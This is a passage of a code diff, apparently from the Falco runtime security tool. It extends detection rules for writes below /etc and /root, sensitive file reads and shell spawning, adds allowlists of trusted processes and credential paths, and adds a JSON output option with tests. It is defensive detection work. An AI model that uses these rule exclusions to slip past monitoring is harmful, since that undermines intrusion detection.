/etc/opt/microsoft/omsagent)) -- macro: omsagent_writing_conf - condition: (proc.name in (omsagent,in_heartbeat_r*) and fd.name startswith /etc/opt/microsoft/omsagent) +- macro: ms_scx_writing_conf + condition: (proc.name in (GetLinuxOS.sh) and fd.name startswith /etc/opt/microsoft/scx) + +- macro: azure_scripts_writing_conf + condition: (proc.pname startswith "bash /var/lib/waagent/" and fd.name startswith /etc/azure) + +- macro: azure_networkwatcher_writing_conf + condition: (proc.name in (NetworkWatcherA) and fd.name=/etc/init.d/AzureNetworkWatcherAgent) - macro: couchdb_writing_conf condition: (proc.name=beam.smp and proc.cmdline contains couchdb and fd.name startswith /etc/couchdb) @@ -497,10 +525,12 @@ condition: (proc.cmdline startswith "java LiveUpdate" and fd.name in (/etc/liveupdate.conf, /etc/Product.Catalog.JavaLiveUpdate)) - macro: sosreport_writing_files - condition: (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and fd.name startswith /etc/pkt/nssdb) + condition: > + (proc.name=urlgrabber-ext- and proc.aname[3]=sosreport and + (fd.name startswith /etc/pkt/nssdb or fd.name startswith /etc/pki/nssdb)) -- macro: semodule_writing_conf - condition: (proc.name=semodule and fd.name startswith /etc/selinux) +- macro: selinux_writing_conf + condition: (proc.name in (semodule,genhomedircon,sefcontext_comp) and fd.name startswith /etc/selinux) - list: veritas_binaries items: [vxconfigd, sfcache, vxclustadm, vxdctl, vxprint, vxdmpadm, vxdisk, vxdg, vxassist, vxtune] @@ -514,15 +544,47 @@ - macro: veritas_writing_config condition: (veritas_progs and fd.name startswith /etc/vx) +- macro: nginx_writing_conf + condition: (proc.name=nginx and fd.name startswith /etc/nginx) + +- macro: nginx_writing_certs + condition: > + (((proc.name=openssl and proc.pname=nginx-launch.sh) or proc.name=nginx-launch.sh) and fd.name startswith /etc/nginx/certs) + +- macro: chef_client_writing_conf + condition: (proc.pcmdline startswith "chef-client /opt/gitlab" and fd.name startswith /etc/gitlab) + +- macro: centrify_writing_krb + condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5) + +- macro: cockpit_writing_conf + condition: > + ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la) + and fd.name startswith /etc/cockpit) + +- macro: ipsec_writing_conf + condition: (proc.name=start-ipsec.sh and fd.directory=/etc/ipsec) + - macro: exe_running_docker_save - condition: (container and proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker)) + condition: (proc.cmdline startswith "exe /var/lib/docker" and proc.pname in (dockerd, docker)) + +- macro: python_running_get_pip + condition: (proc.cmdline startswith "python get-pip.py") + +- macro: python_running_ms_oms + condition: (proc.cmdline startswith "python /var/lib/waagent/") - macro: gugent_writing_guestagent_log condition: (proc.name=gugent and fd.name=GuestAgent.log) - rule: Write below binary dir desc: an attempt to write to any file below a set of binary directories - condition: bin_dir and evt.dir = < and open_write and not package_mgmt_procs and not exe_running_docker_save + condition: > + bin_dir and evt.dir = < and open_write + and not package_mgmt_procs + and not exe_running_docker_save + and not python_running_get_pip + and not python_running_ms_oms output: > File below a known binary directory opened for writing (user=%user.name command=%proc.cmdline file=%fd.name parent=%proc.pname pcmdline=%proc.pcmdline gparent=%proc.aname[2]) @@ -573,8 +635,8 @@ condition: (proc.name=curl and fd.directory=/etc/pki/nssdb) - macro: haproxy_writing_conf - condition: ((proc.name in (update-haproxy-,haproxy_reload.) or proc.pname=update-haproxy-) - and fd.name=/etc/openvpn/client.map or fd.directory=/etc/haproxy) + condition: ((proc.name in (update-haproxy-,haproxy_reload.) or proc.pname in (update-haproxy-,haproxy_reload,haproxy_reload.)) + and (fd.name=/etc/openvpn/client.map or fd.name startswith /etc/haproxy)) - macro: java_writing_conf condition: (proc.name=java and fd.name=/etc/.java/.systemPrefs/.system.lock) @@ -593,7 +655,7 @@ condition: ((proc.name=start-mysql.sh or proc.pname=start-mysql.sh) and fd.name startswith /etc/mysql) - macro: openvpn_writing_conf - condition: (proc.name=openvpn and fd.directory=/etc/openvpn) + condition: (proc.name in (openvpn,openvpn-entrypo) and fd.name startswith /etc/openvpn) - macro: php_handlers_writing_conf condition: (proc.name=php_handlers_co and fd.name=/etc/psa/php_versions.json) @@ -642,8 +704,8 @@ gen_resolvconf., update-ca-certi, certbot, runsv, qualys-cloud-ag, locales.postins, nomachine_binaries, adclient, certutil, crlutil, pam-auth-update, parallels_insta, - openshift-launc) - and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries) + openshift-launc, update-rc.d) + and not proc.pname in (sysdigcloud_binaries, mail_config_binaries, hddtemp.postins, sshkit_script_binaries, locales.postins, deb_binaries, dhcp_binaries) and not fd.name pmatch (safe_etc_dirs) and not fd.name in (/etc/container_environment.sh, /etc/container_environment.json, /etc/motd, /etc/motd.svc) and not exe_running_docker_save @@ -685,30 +747,39 @@ and not openvpn_writing_conf and not consul_template_writing_conf and not countly_writing_nginx_conf - and not omiagent_writing_conf - and not omsagent_writing_conf + and not ms_oms_writing_conf + and not ms_scx_writing_conf + and not azure_scripts_writing_conf + and not azure_networkwatcher_writing_conf and not couchdb_writing_conf and not update_texmf_writing_conf and not slapadd_writing_conf and not symantec_writing_conf and not liveupdate_writing_conf and not sosreport_writing_files - and not semodule_writing_conf + and not selinux_writing_conf and not veritas_writing_config + and not nginx_writing_conf + and not nginx_writing_certs + and not chef_client_writing_conf + and not centrify_writing_krb + and not cockpit_writing_conf + and not ipsec_writing_conf - rule: Write below etc desc: an attempt to write to any file below /etc condition: write_etc_common - output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name name=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])" + output: "File below /etc opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname pcmdline=%proc.pcmdline file=%fd.name program=%proc.name gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4])" priority: ERROR tags: [filesystem] - list: known_root_files items: [/root/.monit.state, /root/.auth_tokens, /root/.bash_history, /root/.ash_history, /root/.aws/credentials, - /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack] + /root/.viminfo.tmp, /root/.lesshst, /root/.bzr.log, /root/.gitconfig.lock, /root/.babel.json, /root/.localstack, + /root/.node_repl_history, /root/.mongorc.js, /root/.dbshell, /root/.augeas/history, /root/.rnd] - list: known_root_directories - items: [/root/.oracle_jre_usage, /root/.ssh] + items: [/root/.oracle_jre_usage, /root/.ssh, /root/.subversion, /root/.nami] - macro: known_root_conditions condition: (fd.name startswith /root/orcexec. @@ -733,6 +804,13 @@ or fd.name startswith /root/.gnupg or fd.name startswith /root/.pgpass or fd.name startswith /root/.theano + or fd.name startswith /root/.gradle + or fd.name startswith /root/.android + or fd.name startswith /root/.ansible + or fd.name startswith /root/.crashlytics + or fd.name startswith /root/.dbus + or fd.name startswith /root/.composer + or fd.name startswith /root/.gconf or fd.name startswith /root/.nv) - rule: Write below root @@ -744,7 +822,7 @@ and not exe_running_docker_save and not gugent_writing_guestagent_log and not known_root_conditions - output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name name=%proc.name)" + output: "File below / or /root opened for writing (user=%user.name command=%proc.cmdline parent=%proc.pname file=%fd.name program=%proc.name)" priority: ERROR tags: [filesystem] @@ -768,7 +846,7 @@ iptables, ps, lsb_release, check-new-relea, dumpe2fs, accounts-daemon, sshd, vsftpd, systemd, mysql_install_d, psql, screen, debconf-show, sa-update, pam-auth-update, /usr/sbin/spamd, polkit-agent-he, lsattr, file, sosreport, - scxcimservera + scxcimservera, adclient, rtvscand, cockpit-session ] # Add conditions to this macro (probably in a separate file, @@ -804,8 +882,9 @@ and not perl_running_plesk and not perl_running_updmap and not veritas_driver_script + and not perl_running_centrifydc output: > - Sensitive file opened for reading by non-trusted program (user=%user.name name=%proc.name + Sensitive file opened for reading by non-trusted program (user=%user.name program=%proc.name command=%proc.cmdline file=%fd.name parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) priority: WARNING tags: [filesystem] @@ -847,7 +926,7 @@ - rule: Modify binary dirs desc: an attempt to modify any file below a set of binary directories. - condition: bin_dir_rename and modify and not package_mgmt_procs + condition: bin_dir_rename and modify and not package_mgmt_procs and not exe_running_docker_save output: > File below known binary directory renamed/removed (user=%user.name command=%proc.cmdline operation=%evt.type file=%fd.name %evt.args) @@ -976,6 +1055,9 @@ or parent_java_running_datastax or possibly_node_in_container) +- list: mesos_shell_binaries + items: [mesos-docker-ex, mesos-slave, mesos-health-ch] + # Note that runsv is both in protected_shell_spawner and the # exclusions by pname. This means that runsv can itself spawn shells # (the ./run and ./finish scripts), but the processes runsv can not @@ -989,6 +1071,7 @@ and protected_shell_spawner and not proc.pname in (shell_binaries, gitlab_binaries, cron_binaries, user_known_shell_spawn_binaries, needrestart_binaries, + mesos_shell_binaries, erl_child_setup, exechealthz, PM2, PassengerWatchd, c_rehash, svlogd, logrotate, hhvm, serf, lb-controller, nvidia-installe, runsv, statsite, erlexec) @@ -1029,7 +1112,14 @@ container.image startswith rook/toolbox or container.image startswith registry.access.redhat.com/openshift3/logging-fluentd or container.image startswith registry.access.redhat.com/openshift3/logging-elasticsearch or - container.image startswith cloudnativelabs/kube-router) + container.image startswith registry.access.redhat.com/openshift3/metrics-cassandra or + container.image startswith openshift3/ose-sti-builder or + container.image startswith registry.access.redhat.com/openshift3/ose-sti-builder or + container.image startswith cloudnativelabs/kube-router or + container.image startswith "consul:" or + container.image startswith mesosphere/mesos-slave or + container.image startswith istio/proxy_ or + container.image startswith datadog/docker-dd-agent) # Add conditions to this macro (probably in a separate file, # overwriting this macro) to specify additional containers that are @@ -1179,7 +1269,9 @@ '"sh -c /bin/hostname -f 2> /dev/null"', '"sh -c locale -a"', '"sh -c -t -i"', - '"sh -c openssl version"' + '"sh -c openssl version"', + '"bash -c id -Gn kafadmin"', + '"sh -c /bin/sh -c ''date +%%s''"' ] # This list allows for easy additions to the set of commands allowed @@ -1272,13 +1364,15 @@ condition: > spawned_process and proc.name in (user_mgmt_binaries) and not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and - not proc.pname in (cron_binaries, systemd, run-parts) and + not proc.pname in (cron_binaries, systemd, systemd.postins, udev.postinst, run-parts) and not proc.cmdline startswith "passwd -S" and not proc.cmdline startswith "useradd -D" and not proc.cmdline startswith "systemd --version" and not run_by_qualys and not run_by_sumologic_securefiles and - not run_by_yum + not run_by_yum and + not run_by_ms_oms and + not run_by_google_accounts_daemon output: > User management binary command run outside of container (user=%user.name command=%proc.cmdline parent=%proc.pname gparent=%proc.aname[2] ggparent=%proc.aname[3] gggparent=%proc.aname[4]) diff --git a/test/falco_test.py b/test/falco_test.py index 79b218e8..19956591 100644 --- a/test/falco_test.py +++ b/test/falco_test.py @@ -30,6 +30,7 @@ class FalcoTest(Test): self.trace_file = os.path.join(self.basedir, self.trace_file) self.json_output = self.params.get('json_output', '*', default=False) + self.json_include_output_property = self.params.get('json_include_output_property', '*', default=True) self.priority = self.params.get('priority', '*', default='debug') self.rules_file = self.params.get('rules_file', '*', default=os.path.join(self.basedir, '../rules/falco_rules.yaml')) @@ -249,7 +250,11 @@ class FalcoTest(Test): for line in res.stdout.splitlines(): if line.startswith('{'): obj = json.loads(line) - for attr in ['time', 'rule', 'priority', 'output']: + if self.json_include_output_property: + attrs = ['time', 'rule', 'priority', 'output'] + else: + attrs = ['time', 'rule', 'priority'] + for attr in attrs: if not attr in obj: self.fail("Falco JSON object {} does not contain property \"{}\"".format(line, attr)) @@ -348,8 +353,8 @@ class FalcoTest(Test): trace_arg = "-e {}".format(self.trace_file) # Run falco - cmd = '{} {} {} -c {} {} -o json_output={} -o priority={} -v'.format( - self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.priority) + cmd = '{} {} {} -c {} {} -o json_output={} -o json_include_output_property={} -o priority={} -v'.format( + self.falco_binary_path, self.rules_args, self.disabled_args, self.conf_file, trace_arg, self.json_output, self.json_include_output_property, self.priority) for tag in self.disable_tags: cmd += ' -T {}'.format(tag) diff --git a/test/falco_tests.yaml b/test/falco_tests.yaml index f176a9b9..5c46d606 100644 --- a/test/falco_tests.yaml +++ b/test/falco_tests.yaml @@ -655,3 +655,19 @@ trace_files: !mux - rules/rule_append_false.yaml trace_file: trace_files/cat_write.scap + json_output_no_output_property: + json_output: True + json_include_output_property: False + detect: True + detect_level: WARNING + rules_file: + - rules/rule_append.yaml + trace_file: trace_files/cat_write.scap + stdout_contains: "^(?!.*Warning An open of /dev/null was seen.*)" + + in_operator_netmasks: + detect: True + detect_level: INFO + rules_file: + - rules/detect_connect_using_in.yaml + trace_file: trace_files/connect_localhost.scap \ No newline at end of file diff --git a/test/rules/detect_connect_using_in.yaml b/test/rules/detect_connect_using_in.yaml new file mode 100644 index 00000000..bd87a56f --- /dev/null +++ b/test/rules/detect_connect_using_in.yaml @@ -0,0 +1,6 @@ +- rule: Localhost connect + desc: Detect any connect to the localhost network, using fd.net and the in operator + condition: evt.type=connect and fd.net in ("127.0.0.1/24") + output: Program connected to localhost network + (user=%user.name command=%proc.cmdline connection=%fd.name) + priority: INFO diff --git a/test/trace_files/connect_localhost.scap b/test/trace_files/connect_localhost.scap new file mode 100644 index 00000000..8806a67a Binary files /dev/null and b/test/trace_files/connect_localhost.scap differ diff --git a/userspace/engine/falco_engine.cpp b/userspace/engine/falco_engine.cpp index 4203515e..4c61e7b4 100644 --- a/userspace/engine/falco_engine.cpp +++ b/userspace/engine/falco_engine.cpp @@ -88,7 +88,8 @@ void falco_engine::load_rules(const string &rules_content, bool verbose, bool al // formats.formatter is used, so we can unconditionally set // json_output to false. bool json_output = false; - falco_formats::init(m_inspector, m_ls, json_output); + bool json_include_output_property = false; + falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property); m_rules->load_rules(rules_content, verbose, all_events, m_extra, m_replace_container_info, m_min_priority); } diff --git a/userspace/engine/formats.cpp b/userspace/engine/formats.cpp index d5e0d386..946db332 100644 --- a/userspace/engine/formats.cpp +++ b/userspace/engine/formats.cpp @@ -25,6 +25,7 @@ along with falco. If not, see . sinsp* falco_formats::s_inspector = NULL; bool falco_formats::s_json_output = false; +bool falco_formats::s_json_include_output_property = true; sinsp_evt_formatter_cache *falco_formats::s_formatters = NULL; const static struct luaL_reg ll_falco [] = @@ -36,10 +37,11 @@ const static struct luaL_reg ll_falco [] = {NULL,NULL} }; -void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output) +void falco_formats::init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property) { s_inspector = inspector; s_json_output = json_output; + s_json_include_output_property = json_include_output_property; if(!s_formatters) { s_formatters = new sinsp_evt_formatter_cache(s_inspector); @@ -155,8 +157,12 @@ int falco_formats::format_event (lua_State *ls) event["time"] = iso8601evttime; event["rule"] = rule; event["priority"] = level; - // This is the filled-in output line. - event["output"] = line; + + if(s_json_include_output_property) + { + // This is the filled-in output line. + event["output"] = line; + } full_line = writer.write(event); diff --git a/userspace/engine/formats.h b/userspace/engine/formats.h index c901460b..dcace918 100644 --- a/userspace/engine/formats.h +++ b/userspace/engine/formats.h @@ -31,7 +31,7 @@ class sinsp_evt_formatter; class falco_formats { public: - static void init(sinsp* inspector, lua_State *ls, bool json_output); + static void init(sinsp* inspector, lua_State *ls, bool json_output, bool json_include_output_property); // formatter = falco.formatter(format_string) static int formatter(lua_State *ls); @@ -48,4 +48,5 @@ class falco_formats static sinsp* s_inspector; static sinsp_evt_formatter_cache *s_formatters; static bool s_json_output; + static bool s_json_include_output_property; }; diff --git a/userspace/falco/configuration.cpp b/userspace/falco/configuration.cpp index 4df8fe79..a3a9098f 100644 --- a/userspace/falco/configuration.cpp +++ b/userspace/falco/configuration.cpp @@ -67,6 +67,7 @@ void falco_configuration::init(string conf_filename, list &cmdline_optio } m_json_output = m_config->get_scalar("json_output", false); + m_json_include_output_property = m_config->get_scalar("json_include_output_property", true); falco_outputs::output_config file_output; file_output.name = "file"; diff --git a/userspace/falco/configuration.h b/userspace/falco/configuration.h index a6ba8fdb..40d54f79 100644 --- a/userspace/falco/configuration.h +++ b/userspace/falco/configuration.h @@ -167,6 +167,7 @@ class falco_configuration std::list m_rules_filenames; bool m_json_output; + bool m_json_include_output_property; std::vector m_outputs; uint32_t m_notifications_rate; uint32_t m_notifications_max_burst; diff --git a/userspace/falco/falco.cpp b/userspace/falco/falco.cpp index 6943a927..aa2253b6 100644 --- a/userspace/falco/falco.cpp +++ b/userspace/falco/falco.cpp @@ -547,6 +547,7 @@ int falco_init(int argc, char **argv) } outputs->init(config.m_json_output, + config.m_json_include_output_property, config.m_notifications_rate, config.m_notifications_max_burst, config.m_buffered_outputs); diff --git a/userspace/falco/falco_outputs.cpp b/userspace/falco/falco_outputs.cpp index 473a8c27..ed07bff2 100644 --- a/userspace/falco/falco_outputs.cpp +++ b/userspace/falco/falco_outputs.cpp @@ -52,7 +52,9 @@ falco_outputs::~falco_outputs() } } -void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered) +void falco_outputs::init(bool json_output, + bool json_include_output_property, + uint32_t rate, uint32_t max_burst, bool buffered) { // The engine must have been given an inspector by now. if(! m_inspector) @@ -65,7 +67,7 @@ void falco_outputs::init(bool json_output, uint32_t rate, uint32_t max_burst, bo // Note that falco_formats is added to both the lua state used // by the falco engine as well as the separate lua state used // by falco outputs. - falco_formats::init(m_inspector, m_ls, json_output); + falco_formats::init(m_inspector, m_ls, json_output, json_include_output_property); falco_logger::init(m_ls); diff --git a/userspace/falco/falco_outputs.h b/userspace/falco/falco_outputs.h index 236a8caf..9a45d599 100644 --- a/userspace/falco/falco_outputs.h +++ b/userspace/falco/falco_outputs.h @@ -41,7 +41,9 @@ public: std::map options; }; - void init(bool json_output, uint32_t rate, uint32_t max_burst, bool buffered); + void init(bool json_output, + bool json_include_output_property, + uint32_t rate, uint32_t max_burst, bool buffered); void add_output(output_config oc);